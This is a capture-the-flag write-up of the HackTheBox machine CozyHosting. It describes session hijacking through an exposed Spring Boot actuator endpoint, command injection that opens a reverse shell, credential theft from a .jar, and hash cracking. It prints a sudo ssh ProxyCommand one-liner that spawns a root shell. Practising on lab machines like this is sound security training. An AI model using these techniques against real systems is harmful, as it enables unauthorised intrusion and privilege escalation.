HackTheBox WriteUp - CozyHosting
- Ts3c
- HackTheBox , WriteUp , Hacking
- January 1, 2024
In this post I will describe my way through the HackTheBox Machine CozyHosting.
Recon and Enumeration
First add the given ip address to the /etc/hosts file to make it accessable via the browser with the url http://cozyhosting.htb
Dashboard
This dashboard will be displayed when you successfully added the IP to your local file.
At the beginning of the recon phase I always scan the given target with nmap. As a result two ports 22 and 80 seems to be open on the target.
The open SSH Port on 22 is interesting but only if we have a chance to guess some username and password combination. In the beginning of this box this is not a recommended way. So next Port is 80. This is a classic HTTP Port for web services. We previously checked that the Dashboard is available. So lets scan the web app with dirsearch.
We receive a lot of results from this scan. What is interesting about this is we receive HTTP 200 Results for /actuator. Quick google search, this path is commonly used by the Spring Boot Actuator
Let’s dig into that a little bit more. When we analyse the endpoints we can access the path /actuator/sessions with a curl. We receive two entries with Session IDs. Let’s switch into Burp and replace the Session ID with the ones we found.
One of the Session ID worked and we got access to the admin dashboard.
The dashboard it not that complex. If we scroll down we can see two input fields (Hostname and Username). Let’s check what this formular does in detail. Therefore we intercept the HTTP request with burp and analyse the communication. As an input I simply chose the value test.
As a result we receive an error message in the HTTP Response that the hostname test could not resolved. Seems like an SSH error.
We figured out that the Dashboard tries to make an SSH Request. After some tests I could make this payload work. This represents an Reverse Shell which is base64 encoded.
Let’s fire this payload up and catch the reverse shell with a nc listener.
In order to make this request work the spaces need to be written as you can see in the HTTP Request above.
If we look around we find a .jar file in the /app Folder. With a Python SImple HTTP Server I copied the .jar file to my local kali instance.
With jd-gui we can analyse .jar files. So let’s install it on our local instance and open up the .jar file.
In Spring applications a very interessting file is the application.propteries file. If we have a look at this we can see credentials to a postgres DB.
let’s connect to the postgres DB on the cozyhosting client.
postgres -h 127.0.0.1 -u postgres
Analysing the postgres Database I found a User and an Admin with there password hashes.
Copy the password hash from admin to an file and run john to crack it.
Connect via ssh with the client using john as username and the cracked password from john.
Privelege Escalation
The Priv Esc Vector was simple this time. Run sudo -l to check for possible vectors.
Found the command ssh which runs with root privileges.
After a quick goole search I found this possible escalation.
https://gtfobins.github.io/gtfobins/ssh/#sudo
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
That worked like a charm. Running whoami to verify if we managed to become root.
Yep worked!
Happy Hacking!
